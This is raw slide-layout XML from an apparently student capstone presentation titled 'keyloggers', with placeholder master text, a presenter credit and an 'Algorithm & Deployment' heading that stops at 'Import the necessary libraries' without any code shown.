              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="900000" lvl="2" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1242000" lvl="3" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1602000" lvl="4" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606080" y="6423840"/>
            <a:ext cx="284436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r>
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="6423840"/>
            <a:ext cx="6916680" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">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77" name="PlaceHolder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558440" y="6423840"/>
            <a:ext cx="105228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fld id="{6326C2DC-F291-4DFD-9E1A-8361E1EB06A3}" type="slidenum">
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" sz="9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 name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="457200"/>
            <a:ext cx="3702960" cy="946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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8042040" y="453600"/>
            <a:ext cx="3702960" cy="98280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>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80" name="Rectangle 10"/>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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81" name="Picture 7" descr="Logo&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485000" y="6437880"/>
            <a:ext cx="1125360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576000" y="729720"/>
            <a:ext cx="11029320" cy="591840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606080" y="6423840"/>
            <a:ext cx="284436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r>
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="6423840"/>
            <a:ext cx="6916680" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">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85" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558440" y="6423840"/>
            <a:ext cx="105228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fld id="{1F7539D2-5ABB-4D37-89E9-2BA9BF07F0B2}" type="slidenum">
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" sz="900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86"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110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864000" lvl="1" indent="-324000">
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1296000" lvl="2" indent="-288000">
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1728000" lvl="3" indent="-216000">
              <a:spcBef>
                <a:spcPts val="567"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2160000" lvl="4" indent="-216000">
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2592000" lvl="5" indent="-216000">
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="3024000" lvl="6" indent="-216000">
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solid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 name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="457200"/>
            <a:ext cx="3702960" cy="946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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8042040" y="453600"/>
            <a:ext cx="3702960" cy="98280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>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90" name="Rectangle 10"/>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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="91" name="Picture 7" descr="Logo&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485000" y="6437880"/>
            <a:ext cx="1125360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606080" y="6423840"/>
            <a:ext cx="284436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r>
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="6423840"/>
            <a:ext cx="6916680" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">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94" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558440" y="6423840"/>
            <a:ext cx="105228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fld id="{69D9A354-E85B-4EAF-B0DA-BC7B28AB1E68}" type="slidenum">
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" sz="9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techtrainer20/TNSDC" TargetMode="External" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.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1359000" y="1821600"/>
            <a:ext cx="9143640" cy="977400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>keyloggers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="TextBox 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-329760" y="1034280"/>
            <a:ext cx="12726360" cy="57888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defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>CAPSTONE PROJECT</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3200" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC5F9F8F-D89B-9B1D-A7DC-236EC852A7EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5119929" y="4778453"/>
            <a:ext cx="3101462" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Presented By:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bhavani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> k- Computer science and Engineering, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DMI college of Engineering </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91CA67EA-C6B9-07D0-7130-C49F9BAEF2E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5119929" y="1811769"/>
            <a:ext cx="1828800" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="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581040" y="702000"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296640" y="-426960"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
